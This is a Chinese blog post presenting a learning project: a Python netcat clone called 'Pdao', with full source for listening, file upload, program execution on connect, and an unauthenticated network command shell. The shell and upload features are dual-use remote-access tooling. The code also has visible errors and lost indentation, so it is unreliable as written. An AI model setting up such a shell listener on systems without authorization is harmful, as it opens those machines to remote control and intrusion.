HackPluto's Blog

自己动手写工具(1)--Netcat

字数统计: 589阅读时长: 3 min
2019/04/23 Share

一直以来都是在用别人写好的工具,为了锻炼自己的编程能力以及更加深刻的理解网络,所以我准备做一个长期的写工具计划。
第一个工具呢就是仿照一个类似于netcat的网络连接工具Pdao,netcat被称为网络界的“瑞士军刀”,功能十分丰富,我的工具参考了NC的功能,主要有如下几种功能:
1.服务端的监听
2.上传文件
3.反弹shell
4.下载文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
import sys
import socket
import getopt
import threading
import subprocess

#global variable
listen = False
command = False
upload = False
execute = ""
target = ""
upload_des = ""
port = 0

#Instructions for use
def usage():
print('\t\t\033[0;32m Pdao net Tool \033[0m')
print("Usage:python3 pdao.py -t target_host -p port")
print("-l --listen - listen on [host]:[port]")
print("-e --execute=file_to_run -execute the given file upon receiving a connection")
print("-c --command -init a command shell")
print("-u --upload=destination -upload a file and write to [desination]\n")
print("Examples:")
print(r"python3 pdao.py -t 100.0.0.1 -p 1234 -l -c -u=c:\\hack.exe")
sys.exit(0)



def clinet_send(buffer):
client = socket.socket()
try:
client.connect((target,port))

if len(buffer):
client.send(buffer)

while True:
recv_len = 1
response = ""
while recv_len:
data = client.recv(1024).decode()
recv_len = len(data)
response += data
if recv_len < 1024:
break
print(response)
buffer = input("")
buffer += '\n'
client.send(buffer.encode())
except :
print("[*] Exception Exiting.\n")
client.close()

def client_handler(clinet_socket):
global upload
global execute
global command

if len(upload_des):
file_buffer = ""
while True:
data = clinet_socket.recv(1024).decode()
if not data:
break
else:
file_buffer += data

try:
file_descriptor = open(upload_des,"w")
file_descriptor.write(file_buffer)
file_descriptor.close()
clinet_socket.send(b"success save file to %s\n"%upload_des)
except:
clinet_socket.send(b"Failed to save file to %s\n"&upload_des)

if len(execute):
output = run_command(execute)
clinet_socket.send(output.encode())

if command:
while True:
clinet_socket.send(b"<Pdao_Shell:#>")
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += clinet_socket.recv(1024).decode()
response = run_command(cmd_buffer)
clinet_socket.send(response)


def server_loop():
global target
global port

if not len(target):
target = "0.0.0.0"

server = socket.socket()
server.bind((target,port))
server.listen(10)
while True:
clinet_socket, addr = server.accept()
clinet_thread = threading.Thread(target=client_handler,args=(clinet_socket,))
clinet_thread.start()

def run_command(command):
command = command.rstrip()
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
except:
output = b"\033[0;31m Failed to execute command.\n\033[0m"

return output

def Main():
global listen
global execute
global command
global upload_des
global target
global port
if not len(sys.argv[1:]):
usage()

try:
opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])

except getopt.GetoptError as identifier:
print('\033[0;31m'+str(identifier)+'\033[0m')
usage()

for o,a in opts:
if o in ("-h","--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e","--execute"):
execute = a
elif o in ("-c","--command"):
command = True
elif o in ("-u","--upload"):
upload_des = a
elif o in ("-t","--target"):
target = a
elif o in ("-p","--port"):
port=int(a)
else:
assert False

if not listen and len(target) and port > 0:
buffer = sys.stdin.read()
clinet_send(buffer)

if listen:
server_loop()


Main()
CATALOG